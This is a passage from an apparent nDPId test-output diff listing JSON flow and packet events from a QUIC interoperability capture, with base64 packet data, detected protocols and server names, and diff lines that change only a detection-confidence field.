FuLxOAzdvDCKb+Mw\/ATbe3lk+yLwq8IFMq6jKdrgufqcgEK\/DE45uK6DkeDtg2Nfk41dXE6E2W06tsmVdvKzE9ZnBhUhe2ejOTPCQOMOhKKxW1gu5IyfCpHbjJN2vfvhyPN0OnZybFzDxqcGmwjQ+YG+BTWqim17tKyUSWvtfljnxHMSsPqRy6Y6NfBCNp1aUpwRPLdmmujG8IVPEXIU\/kof9d0KApSsa1g5\/lxQVV6EBiKhgM1boWQ5RBl6ra1rwDg1yBBAJS3flCp5HcSZz1flGcqFaVEsVrUVz+AEXY9ruE1orPMbY+wl+lHasmZLW74cTNm+UINmjH3A+DsXhcmXvfEm5hNNThZ\/NnJpbpD4NH5H02TzCShSKgJ69RlVFghhhWba9V1v0pJT8dy2Wkw9Ko6Pt9n7LOTgLjbmfTwItWhZTZuppOfwln5Ay+ujYsECxELS1meSTPXMgPFm5ZqFNUQ4ewBWDBiyF0UuaCFEJLCwQMzr3L1MCmNTV6WeniY70fageRh2KTa3ox9TKmffiA5zTBLt8Z7BCR5or8UDQn
5nVW9FpnezChyvtJGlUcukrf1\/2Yv6T6Ix+RUzOFNkHL\/DYqhcyt5IZvOgg9EpYeiSpp\/jf5smjFh0ytesmJY86N5x+rphh2jl\/Hh13FoM1EltzV1MqIusbwoLTLdDb5Z6FDqYBCG0rctA=="} -01004{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434606,"flow_last_seen":1603816434606,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434606,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"131.159.24.198","src_port":41587,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"pandora.cm.in.tum.de","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +01004{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434606,"flow_last_seen":1603816434606,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434606,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"131.159.24.198","src_port":41587,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": 
{"client_requested_server_name":"pandora.cm.in.tum.de","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00563{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":34,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434609,"flow_last_seen":1603816434609,"flow_idle_time":140000,"flow_min_l4_payload_len":556,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":556,"midstream":0,"thread_ts_msec":1603816434609,"l3_proto":"ip4","src_ip":"51.158.105.98","dst_ip":"192.168.1.128","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 01190{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1603816434609,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":590,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":590,"pkt_l4_len":556,"thread_ts_msec":1603816434609,"pkt":"PKn0qB\/spJGxgjQ5CABFAAJA990AAC0BNLcznmliwKgBgAMKP5oAAAAARQAFAKEiQAAwEUWiwKgBgDOeaWLKrwG7BOynncIKCgoKCBGs9QKfvVcQAABE0lvluJrmL\/hMeUw3YRhBIJ\/7gLtKpaIz\/yfYSAz6s8M\/iZU1xT7UiPmoiPsMT3FCwMnulK4pxlFMwSTfXCJHpc614jjRRPQY0r4A52kRAqbpnpm4pGdhwJNk2VhjYh04QB+ATZnDkcsklWaxwa1n6YHU9l\/hwXdVfRMJRZaRjlnNVjFzYTJDWF1bqR3R+8VW0waOTiwhJbmwo0jy0HGIxrRni0iCPehpoLwTjyK71TyZayvNhxdtGvZzTbpHaeAT15y\/CNrfq29HSv4IbvE0UmtwPnAkf\/K1m2amootTqW7mZ0NRHFK3HiA6yyoxrFYKU9\/CqXLS00PyxBFYvXIH8JHdvMhif7EW2Q2vZzfwwkJPwkHVXd+ngfY6wGLILtNDXV2ivGtdy3XuvH2ccmQEKSFZ73Hx9iHdBl6qjfCYRhGp6e+IEQqSNu4vIjwJrHd1DI7AFuP5HVV3t0uwiRNlmNLYg\/\/iQ8SXBZOZZXE4JJ7SqpmG4T8bxGnZ3BCjiEFishkM4w78EsJooOt\/y+Ru+rpDXeXF0DEDfcvmU78O5MK3Ul65ZjzZQp5A08B7wuQCd5NseMaqkP4jaydGTyiWvmW0mmoH\/qDqrJMH+DDDY2TMH7n1pK4uNzfng27Vymwlz4bVFY+NOz3R05sw0AhIXP9mFCKSmts="} 
-00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434609,"flow_last_seen":1603816434609,"flow_idle_time":140000,"flow_min_l4_payload_len":556,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":556,"midstream":0,"thread_ts_msec":1603816434609,"l3_proto":"ip4","src_ip":"51.158.105.98","dst_ip":"192.168.1.128","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":7.654703} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434609,"flow_last_seen":1603816434609,"flow_idle_time":140000,"flow_min_l4_payload_len":556,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":556,"midstream":0,"thread_ts_msec":1603816434609,"l3_proto":"ip4","src_ip":"51.158.105.98","dst_ip":"192.168.1.128","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":7.654703} 00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1603816434622,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":89,"pkt_l4_len":35,"thread_ts_msec":1603816434622,"pkt":"PKn0qB\/spJGxgjQ5ht1gDsWjACMR8CoF0BgM6YEAzSri\/bO+xasgAQsHCsnVrqTT\/kdpHoB9EVGcCQAjCvHgAAAAAAAIawwAN\/DoMJL\/AAAd\/wAAHP8AABs="} 
00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434628,"flow_last_seen":1603816434628,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434628,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"202.238.220.92","src_port":38933,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02141{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1603816434628,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434628,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAStBAAEARganAqAGAyu7cXJgVAbsE7FzZxgoKCgoISaS\/HP4FIE0AAETS8b\/jD+OLMZ5ZfmIPp7wLwtSW\/3e3V56tG1ccXR3vL4iMRvcTifVjxLwR1VEj5kxXicua4ELuOiBh14YJiINigpT2w+4dKhfV++T2HAdDXb9HRo8Wp5\/Q2I0xH7P0GEZjVSlxh\/KVM7Q8JSVkblMvtsmlTbMHoKyKgv5ZVuhR9rKzyWjc0bDTpihNkKGhI2W23K8YpCOo163pvnpUs8vCjpMKx6Y+XLOjz86VHxZ\/dSIUgwZkfU3hXvxraGDqsOM6nk2BsxRj6ED+eksutrG0VvP5Wbl\/nwohJ3snk4n+kCBY8+CDoT5Q6xIqcKNeqA91veY6WDNW65NdLK9tq0Kt6NyRCQ0iHC1fm8oqxzK49Xy9Yr2klZXjGA6Wb9UmYx6KSJdvg6i+UYQf+hP3vTAcVrvclwQjn1Ttts6+sIXx63DdYoKsDizIkqnYCVuj0roAtIdLG95OmHxjKHrmpsQyLltGhTZMsYJQRCx5M8PpL+vjXo6pu+GHq\/GNM20vpbcH4SfliMSbdeHv4qviRxdJ9R8w9OkBT6XZozO3wWdBmA6PqET53j\/ug0iSc1MIiO+\/q4LSySrTDiP2OBzfwZT7hTAaYz1DN1CxY6wbbPEjnyqCdpqZ1PaOkaWb8OYt7bm6J9VMzWbMZaVbajU0njanBfI51vKbom0V4qvMvcrqXEEunVPVtjgIskNplvDAftVJ2vZJjRMGUEv2c4SLniMT\/gRm2OeeaPXHe1brAnbRvP5KwVwSyHq8W08M66VBt+caimizIdJuqJqF1FGzRpHgQJNETaOqosq4CaLQrU1BEEg3UbRSYSWKj7OLTgEqG1JOZb\/nz1GI+TfOOMiy+107aqM+S\/i3Tju69xYk1X3WP1Ozrd6Wj6AC50FxHQQFSXlNPa5e\/vjVo4r
FyU+uJE9u8JoYphh7MyJDB1VngH+kgiqxcBa2QBM5E51d4uR1hQLe+c6gd3MDh43gdsQryQiQifYdGhNRWZZaw2p8fRtUP4Uwyq\/B0bHFpZ4t6PuvIBU1+212nGGZUAL7j3HFR48RnO1qbO+GAhey5N9lWYMlU5tavGiXfOhlX6cAsUEQ2Q6TLV\/ZCB5CQG5QDTtdPH0QZSPPPDEVyy6HE2QB0rH4vjru2j5voDUPBjLlpBQ\/NL5R+mTgOnDFh7tGqQnBHhyDGFO\/50NeIGNTAc07+9N1IfFyQChGLc3grwS1SkOgfURlQLF+0ioikEL5irbMrmWTd851GONI9exui+8KOT8c959NcGrcyY1CIpxJc6JPQNgq4cGI4ljycOhrXFfcY+tJlEO3E0yGYN4gMAGSars7BkXFZLPWbZY+Sb4jXpDImxv+f95nzmTySeAQGcAaOitCLcJ318ljtkj4SzzBlngK7\/jHpA1EPvZ2SJKmWjryUfQf4JJVEzK0DHUTA6qLYV+785FtwR53Rvcfx8ZKasxHIdWmDmMQfSDcjCfFkiPKXadftOSR0e\/XsF34XRoyBUx5eKGVWThXeNxNkMdpKbVofP1BRG3kl02O63aebe4V6uZI5YzyQUh4Dl097fgC5KIZDSXh1zEWqkg2eojIxOsLE8glsZ++gAFLU+Q749QmZTjBy2vyjMlxdSRKWMC6H66lOKBGFFFOZV6nr8Cmiz6E4iT7yg=="} -00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434628,"flow_last_seen":1603816434628,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434628,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"202.238.220.92","src_port":38933,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"mew.org","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 
+00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434628,"flow_last_seen":1603816434628,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434628,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"202.238.220.92","src_port":38933,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"mew.org","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00647{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":37,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434628,"flow_last_seen":1603816434628,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434628,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a00:ac00:4000:400:2e0:4cff:fe68:199d","src_port":52271,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02142{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1603816434628,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434628,"pkt":"pJGxgjQ5PKn0qB\/sht1gCIsNBNgRQCABCwcKydWupNP+R2kegH0qAKwAQAAEAALgTP\/+aBmdzC8RUgTYW27FCgoKCgiOjC+QJeVzXQAARL7JSt9fXYbHm89vAcaC3zVPl3CRJrP6TUqyl19zIq90T7T2NXCDcXHJobasDcuXuTxPvCCLEvFASvzCuAXXUk3HWjKo77c+LloXAI84Zwqo8KPwvyzsluIwpPaCQQSGiuEyjDniWlSc55j3zHtvxBYI+7qs\/+m2E9Qo9cHvaYLyJZyEsYiKOdymD9qvtzbmDAszHuIEjcfE2JjV4l3DJqKhapzLQbS9PctxujyF1VUI2ACV8ytLLBKZMFRXoJlO+bWzOXqbJSZ6o5mClNhR1vsaR6skwjkGqVgCBLklKilA+9\/6l4ZG3WIaUFiUoM7SgIxwWF8oyiKV7zmkaclu4f5\/3yzgGms+jvNfvtwGzb3Fgy2XF4aZ5O5HDcLbhvsSrvGKNU1KYKAXZ4nH8RB1\/jFqFn4mCqeFIiG1sLtiDLSix9f1+6LcFT10dfWo8qUHWrWQKOTbIY9nDBXTCntoa14qK3CE8mecM2VJ7ggYOHeAYHiK\/KSjuFeEFZdZUdhlNNgz9SYFL52F6XzgaZRwl5PM1sfRI+PVfN3H8HWyDW3URl12iKPr73MNCK5qktammCheXnaJBQPkIp2os8caGwd0tnC6YXcJ6lRUUduYnFyZK+vu28T7Dz\/LrOOfuQtWldYrGOIU6j6+ccDKu9WWuVGuX87kKb6hFa\/0Hcn3qf5Lj8lhGc0veQe668VrdjsW9Dbg+kfK24zU3dHzbLq\/XM+CIHEV0Yi\/cWiNNyuRa7ulzdTCAyRs9gYlEY9PmbmMmVnZTQWIYxLrJJXunKhqYDK1mFGTl5IvfBZY7XkX4mf2dHPjv4NDEk1QrCa1hHmGBMvl396\/dwaT6SqqWUBPCDC6vSElGrAMRRGJq9LvfuTt+lbz304CY2d8TLKimJoo6M2hj9FCUJij7LzuvBHoekrCNTyCpGkXK+6f28WuMzCkJmtH+2+vwCZ0cKmQ7CrGhhaebnvQZwlEFUK4HQuJy5pSXRkTWfe3guDQnvG2+9SrouXEZwHBxw4mhOlu4pZjXEqExMqWvswlRLClP4rnliDXpHH40rXKEVBoT8v\/j3qP19acEvtZNPaR+ixqYrvXUyjrT2RlXNw57\/diViUriBwdc6BZan7TmLF2I9JRDJyDmqg737XOiOdNXmktfhguZlHvtu8BzXOxe9QBMRua9UDc+uCEMwFmlIsRXS+UZdgutMlJZ1Lbmq8+H9dnSORxZcpeFndW83URbDqnqh3rTxU46PizBvjU3UUHxGcviHiAab4O\/xs7Wgwm5afjOM4HWTr2GZZohe06rmbLxZYWQRT95qnnPQz6O3YXVkngtM49zsYfYtwWc\/15r8OVdncTVWq9tmcsY+IComKrHlZhTs92vAihW5Z6kvjaWc9ntG7+kh9ebleS75pVIAPP3qfgdh\/HVMZQrPcJuQH8Y\/E2UgruG3vXoC9MYlyYHSvs\/p0NoudzrUECbg4P227GFsxLEbPUVjR8Ll
C7rVNTvhNIZWwC\/QrTxuvgRdHhiNNC8M2PCOHRg+GtiTF2\/CGbeBUpGmKvLPodeqZZylHTZhjgU1MkqVoyyY00fBkWduQkCMwlkuamhmTtYdY4kHKiR0ij2DmQLnLbFkclRCdK5g1smA=="} -01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434628,"flow_last_seen":1603816434628,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434628,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a00:ac00:4000:400:2e0:4cff:fe68:199d","src_port":52271,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quant.eggert.org","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434628,"flow_last_seen":1603816434628,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434628,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a00:ac00:4000:400:2e0:4cff:fe68:199d","src_port":52271,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": 
{"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quant.eggert.org","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00637{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":38,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434628,"flow_last_seen":1603816434628,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434628,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2604:a880:800:a1::1279:3001","src_port":51040,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02144{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1603816434628,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434628,"pkt":"pJGxgjQ5PKn0qB\/sht1gBiRvBNgRQCABCwcKydWupNP+R2kegH0mBKiACAAAoQAAAAASeTABx2ARUQTYzffDCgoKCggnNhDgZJaMQwAARL5IzeYAwPvJhqXqSzYyuvoAe\/H9DvMh4rH9IopmFLLCj+PhBdGZ40ll7ADayrGRVomiqXfQeeqE4lI0JVucWTRV10wN\/2X8338TTB6+1v0VW\/8KTorpg06AYkrrASXu2b1BsrKpwLL271kd\/dx+mnQSA2BQKuHrVBCwcaBHI0r8YyjQ1srYGqRDA+zKcgWvk4OEb2anzxkS+TxZp3BCgoJSxTVTaR5r447ESHGMmgukiZT5KEHWyWxF9d02oG1WB5o1fyWZF5XPYIfDooBiT1AvbGvAvfKT01RDHMenDf9O5UT9ob9+XRCiw125P6PnFWGEuoX7atzAW9zVIg++DcOuD6bQBa6hwrgrZiQuNBd8kuQqMdvHefesXx4K8g4hi0yN8Q2JiBx10ybm+sDchOmA+ZGI3KJA9MxZ0Sp73D0+bCJe480Wpk3E7r2Z4INozKeBGUIjWkyo7qFkmuan\/71DIvrB9t\/xagwgNTTJ3tPFFcZxULz8+MN\/EAmmnIbFUMJkGpaxaZkxUwzdBzzVfWgWxOxaXp6E\/Sp0HvH7wVBpKbhjbMf7v+XMfD
LFzWRXSgKS3UI3Pb2wyqIDyMku47b+QW5Q8ogC6pRm7vw2ChoPyXCwYbBnsPUrSwZulaXZ21SytHaEU9+EZo8BWLIhbxHDWCqgcwiQOrN2ld6qsp3S\/Vk9wosbHKzGjZ8Fq0IulMECZI2u3F39UfOXkQRBydLXb8SJP0YbtSDYwJVwphKDdTuYShkSh02mqvLr++kOOrUBElEDb2FTjuj4gpf7X+VxQEKj1eV44pEqEnAkpTwMxZvrlvupezB2DaPuSdgJ2oTp\/O7zZVUZF0m\/4ldGEeQhWTjIV6CkEIKpRvwcA+UXJ\/KFZ8RG5C3FjLxgW6qDeZaa51INZ1jnCY0wbHYbjsu1o4BqZImbBcIYiSFGPgjyz05R3AU2gPyjMwQtepARpLhB2m2nPYRAMfmllWHd3xwrKK3Glp060Yi1hFmvIsxBYN\/HFmXph\/R7xAQ\/NCCsyb233XTR61h+5mjyr3kBdhvRp4FWAfrGEcdmYH09lxw8fsoI2fyGmlrIiLbF3Ib+dz+bKp06GWcTagDImEuKvHXDoqew6XT8CRp81NMwgYp2C0sRRT0X375VlYNNoST080OfYYTMWSZLZIXQh8aObm1WMLPdvWnM+yeTd\/mCvRRGkSoRfYLC7RPv4Px+NqngI+PBo1onxLjP+L4PKyIXY5M1Wb\/ntYVcCVD6Mu2L9o7pVgw2OSUjjv0o88lqeZ+5ZeeRR6GyrHda3BrAmnkZ+qpQgDgKYZH0YS\/dr3\/dP2b05Ar17LfJufSjGiJu4ojISm\/iPkcpJzhCB0Ulyrv0Qi0cZ\/5EJ37Gp3EGx9wtbixPCiSDCeFvjur1Q9TswIkIMcYKjzlTF8c4ari4VRXM+F7\/DFMpQowUPXMsTOknhf+QiC8PtIgajvJPz0z4ts8GtDrZNFWP1dmxLaXIf8adUNIotOd08gg+Fo+EaXwzTPqlyv8pnBs9YKcfmrjrW8mdx7psWvRm4G1XHb9iD7+F8FJK6uKYd40yFQLCG28wXMkr8rTqhU71QNHZ421qXPLwoECcRhsDGlUiQgzViqn2CQ=="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434628,"flow_last_seen":1603816434628,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434628,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2604:a880:800:a1::1279:3001","src_port":51040,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": 
{"client_requested_server_name":"http3-test.litespeedtech.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434628,"flow_last_seen":1603816434628,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434628,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2604:a880:800:a1::1279:3001","src_port":51040,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"http3-test.litespeedtech.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00564{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":39,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434629,"flow_last_seen":1603816434629,"flow_idle_time":140000,"flow_min_l4_payload_len":556,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":556,"midstream":0,"thread_ts_msec":1603816434629,"l3_proto":"ip4","src_ip":"131.159.24.198","dst_ip":"192.168.1.128","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 
01187{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1603816434629,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":590,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":590,"pkt_l4_len":556,"thread_ts_msec":1603816434629,"pkt":"PKn0qB\/spJGxgjQ5CABFAAJAgVoAADQBpNWDnxjGwKgBgAMDhTkAAAAARQAFAE67QAA0EZSkwKgBgIOfGMaicxFRBOyPwMEKCgoKCAqQphKlf+flAABE0q1MzAF7B\/pTV0kG5xawMpe3HkhLaz5LmMUUyw3WhYoi5nbpPV7NpV4GM27AXpOgHO\/SzLtIdktFTC4TCKMp7m9qMnCbweSvMGChHkpC5U7w60\/uPzwGl47ucIe9rYiZgKyYjN+8oftGbKB4AlEqhdFs2MoFYovXtoKkQBN7VSB0IxvuY2TC3GidshXx3wTMXfzuo1\/6i1KLTmmNbxSq1CGPdP1PQ24uDLBbi+meANNn06rbl+K9tUdkmsxH+USREu4XCkprwqJDGZjipci4pVwimHHp5mYTfFDWt8XxRCHJmOScE5wt7DLDqP6wUv\/R9RjuGRN\/nD4BOc5F4Knrlg